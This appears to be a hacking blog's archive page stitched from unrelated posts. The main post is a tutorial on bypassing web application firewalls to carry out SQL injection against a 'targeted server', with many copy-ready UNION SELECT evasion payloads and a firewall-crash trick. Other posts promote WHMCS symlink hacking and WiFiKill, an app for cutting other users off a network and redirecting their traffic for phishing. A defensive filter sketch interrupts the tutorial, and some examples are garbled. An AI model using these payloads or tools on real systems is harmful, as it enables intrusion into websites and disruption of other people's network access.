Category Archives: Hacking
WHMCS Hacking
- Symlink Enable Shell
- Symlink Files
- My Tutorial 😉
Top Android Mobiles For Hackers~
OS | Android OS, v4.1.2 (Jelly Bean)
Memory | 8GB built-in, 1GB RAM, microSD card (supports up to 64GB)
Processor | Dual core 1.2 GHz, Broadcom BC28155 Chipset
Qmobile Noir A20
OS | Android OS, 4.1 Jelly Bean
Memory | 4GB built-in + 8GB card included in box, 1GB RAM, microSD card (supports up to 32GB)
Processor | Quad-core 1.2 GHz, ARMv7 Chipset, GPU (PowerVR SGX)
Qmobile Noir A50
OS | Android Jelly Bean (v 4.1)
Memory | 4GB ROM, 512 RAM, microSD card (supports up to 32GB)
Processor | 1GHz Dual Core
Huawei Ascend G510 U8951
OS | Android OS, v4.1 (Jelly Bean)
Memory | 4GB built-in, 512MB RAM, microSD card (supports up to 32 GB)
Processor | Dual core 1.2 GHz Cortex-A9 |
Sony Xperia L
OS | Android OS, v4.1 (Jelly Bean)
Memory | 8GB built-in 1GB RAM, microSD Card (supports up to 32GB)
Processor | Dual-core 1 GHz, Qualcomm MSM8230 Snapdragon Chipset
Samsung Galaxy Note II
OS | Android OS, v4.1.1 (Jelly Bean)
Memory | 16/32/64GB built-in, 2GB RAM, microSD card (supports up to 64GB)
Processor | Quad-core 1.6 GHz Cortex-A9
Samsung Galaxy S3
OS | Android OS, v4.0.4 (Ice Cream Sandwich)
Memory | 16/32/64GB built-in, 1GB RAM, microSD card (supports up to 64GB)
Processor | Quad-core 1.4 GHz Cortex-A9 + Mali-400MP GPU, Exynos 4212 Quad
HTC One
OS | Android OS, v4.1.2 (Jelly Bean), upgradable to v4.2.2 (Jelly Bean)
Memory | 32/64GB built-in, 2GB RAM
Processor | Quad-core 1.7 GHz Krait 300, Qualcomm APQ8064T Snapdragon 600 Chipset
Sony Xperia Z
OS | Android OS, v4.1.2 (Jelly Bean), planned upgrade to v4.2 (Jelly Bean)
Memory | 16GB built-in 2GB RAM, microSD Card (supports up to 32GB)
Processor | Quad-core 1.5 GHz Krait, Qualcomm MDM9215M / APQ8064 Chipset
How To Hack Targeted Server?
Advanced WAF Bypassing Techniques
Let’s Begin!
How to know if there is a Web Application Firewall?
This is pretty simple! When you try to enter a command used for SQL Injections (usually the “UNION SELECT” command), you get a 403 Error (and the website says “Forbidden” or “Not Acceptable”).
Example:
http://www.site.com/index.php?page_id=-15 UNION SELECT 1,2,3,4....
(We get a 403 Error!)
Basic/Simple Methods:
First, of course, we need to know the Basic Methods to bypass WAF…
1) Comments:
You can use comments to bypass WAF:
Code:
http://www.site.com/index.php?page_id=-15 /*!UNION*/ /*!SELECT*/ 1,2,3,4....
(First Method that can Bypass WAF)
However, most WAFs identify this method, so they still show a “Forbidden” Error…
2) Change the Case of the Letters:
You can also change the Case of the Command:
Code:
http://www.site.com/index.php?page_id=-15 uNIoN sELecT 1,2,3,4....
(Another Basic Method to Bypass WAF!)
However, as before, this trick is also detected by most WAFs!
3) Combine the previous Methods:
What you can also do is to combine the previous two methods:
Code:
http://www.site.com/index.php?page_id=-15 /*!uNIOn*/ /*!SelECt*/ 1,2,3,4....
This method is not detectable by many Web Application Firewalls!
4) Replaced Keywords:
Some Firewalls remove the “UNION SELECT” Statement when it is found in the URL… We can do this to exploit this function:
Code:
http://www.site.com/index.php?page_id=-15 UNIunionON SELselectECT 1,2,3,4....
(The "union" and the "select" will be removed, so the final result will be: "UNION SELECT" 😀 )
5) Inline Comments (Thanks to Crysan):
Some firewalls get bypassed by Inserting Inline Comments between the “Union” and the “Select” Commands:
Code:
http://www.site.com/index.php?page_id=-15 UnION/**/SElecT 1,2,3,4...
(The U is equal to "U" and S to "S". See more on the Advanced Section....)
I believe that these are the most basic Methods to WAF Bypassing! Let’s move on more advanced ones…
Advanced Methods:
Now that you have learned about Basic WAF Bypassing, I think it is good to understand more advanced Methods!
1) Buffer Overflow / Firewall Crash:
Many Firewalls are developed in C/C++ and we can Crash them using Buffer Overflow!
Code:
http://www.site.com/index.php?page_id=-15+and+(select 1)=(Select 0xAA[..(add about 1000 "A")..])+/*!uNIOn*/+/*!SeLECt*/+1,2,3,4....
(( You can test if the WAF can be crashed by typing:
?page_id=null
/**//*!50000UnIOn*//*yoyu*/all/**/
/*!SeLEct*/
/*nnaa*/+1,2,3,4....
If you get a 500, you can exploit it using the Buffer Overflow Method! :: Thanks Crysan for the Test))
2) Replace Characters with their HEX Values (Thanks to Crysan!):
We can replace some characters with their HEX (URL-Encoded) Values.
Example:
Code:
http://www.site.com/index.php?page_id=-15 /*!union*/ /*!select*/ 1,2,3,4....
(which means "union select")
3) Use other Variables or Commands instead of the common ones for SQLi:
Apart from the “UNION SELECT” other commands might be blocked.
Common Commands Blocked:
COMMAND | WHAT TO USE INSTEAD
@@version | version()
concat() | concat_ws() --> Difference between concat() and concat_ws(): http://is.gd/VEeiDU
group_concat() | concat_ws()
[!]-> You can also try to SQL Inject with the NAME_CONST Method: http://is.gd/o10i0d (Created by Downfall)
Learning MySQL Really helps on such issues! 😉
4) Misc Exploitable Functions:
Many firewalls try to offer more Protection by adding Prototype or Strange Functions! (Which, of course, we can exploit!):
Example:
The firewall below replaces “*” (asterisks) with Whitespaces! What we can do is this:
Code:
http://www.site.com/index.php?page_id=-15+uni*on+sel*ect+1,2,3,4...
(If the Firewall removes the "*", the result will be: 15+union+select....)
So, if you find such a silly function, you can exploit it, in this way! 😀
[+] In addition to the previous example, some other bypasses might be:
-15+(uNioN)+(sElECt)....
-15+(uNioN+SeleCT)+...
-15+(UnI)(oN)+(SeL)(ecT)+....
-15+union (select 1,2,3,4...)
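Seen from the defender's side, every variant above works against a filter that matches the raw request text or that edits the request and forwards it. The sketch below is an added example, not code from the original tutorial or from any WAF product: it canonicalizes a parameter value before matching, rejects instead of stripping, and fails closed on oversized input. MAX_LEN, the function names and the simple regex (a stand-in for a real SQL tokenizer) are assumptions.

```python
import re
from urllib.parse import unquote_plus

MAX_LEN = 512  # assumed per-parameter cap; oversized values are rejected, not skipped
UNION_SELECT = re.compile(r"\bunion\b.*?\bselect\b", re.S)

def naive_strip(value):
    """The 'replaced keywords' filter: delete keywords once, then forward."""
    return re.sub(r"union|select", "", value)

def canonicalize(value):
    """Approximate what MySQL would parse from a raw parameter value."""
    prev = None
    while prev != value:                      # decode until stable (nested encoding)
        prev, value = value, unquote_plus(value)
    value = value.lower()                     # SQL keywords are case-insensitive
    value = re.sub(r"/\*!\d*", " ", value)    # /*!...*/ body is executed, so keep it
    value = re.sub(r"/\*.*?\*/", " ", value, flags=re.S)  # plain comments = whitespace
    value = value.replace("*/", " ")          # closers left over from /*! blocks
    return re.sub(r"\s+", " ", value).strip()

def verdict(raw):
    """Return 'block' or 'pass' for one raw (still URL-encoded) parameter value."""
    if len(raw) > MAX_LEN:
        return "block"                        # fail closed on oversized input
    return "block" if UNION_SELECT.search(canonicalize(raw)) else "pass"

# Constructed samples: the parameter values shown in the tutorial above.
SAMPLES = [
    "-15 UNION SELECT 1,2,3,4",
    "-15 /*!UNION*/ /*!SELECT*/ 1,2,3,4",
    "-15 uNIoN sELecT 1,2,3,4",
    "-15 /*!uNIOn*/ /*!SelECt*/ 1,2,3,4",
    "-15 UnION/**/SElecT 1,2,3,4",
    "null/**//*!50000UnIOn*//*yoyu*/all/**//*!SeLEct*//*nnaa*/+1,2,3,4",
    "-15+(uNioN)+(sElECt)+1,2,3,4",
    "-15+union (select 1,2,3,4)",
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(verdict(s), "|", canonicalize(s))
    # Stripping manufactures the statement it was meant to remove:
    print(repr(naive_strip("-15 UNIunionON SELselectECT 1,2,3,4")))
```

The nested-keyword value is harmless until a filter strips it, which is why the check blocks the request rather than rewriting it; the lasting fix remains parameterized queries in the application behind the WAF.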
BlackHat SEO – Get High Page Rank 4 Or 5
” Losses = 10 Benefits = 4 “
WiFiKill v1.7 – WiFi EjeCtOr
If you want to cut off any IP address that uses the same router to connect to the internet, you can now do it from your Android device: WifiKill can disable the internet connection for a device on the same network. This is an alternative version of NETCUT for Android. It simply allows you to scan your WiFi network for devices, see their vendor and cut the network connection for specified devices. This way you can get rid of network hoggers. It gives an option to redirect HTTP traffic to a specific IP; this feature can even be used to do phishing smartly.
Changelog:
- fixed the counter bug (I hope for the last time)
- added an option to redirect HTTP traffic to a specific IP (caution! this may lead to significant CPU load)
- now successful kills are tagged by a green icon on the left of the IP (this is not 100% correct)
Network Security Toolkit v2.16.0-4104 Released
The Network Security Toolkit is a bootable ISO live CD/DVD (NST Live) based on Fedora. The toolkit was designed to provide easy access to best-of-breed Open Source Network Security Applications and should run on most x86/x86_64 platforms.
Yaptest – Penetration Framework
- Run nikto on anything nmap thinks is an HTTP service
- Run hydra on every host with TCP port 21 open
- Attempt to upload a file to any TFTP servers found
- Run onesixtyone on all hosts that are up
- Try metasploit’s solaris_kcms_readfile exploit against any hosts running kcmsd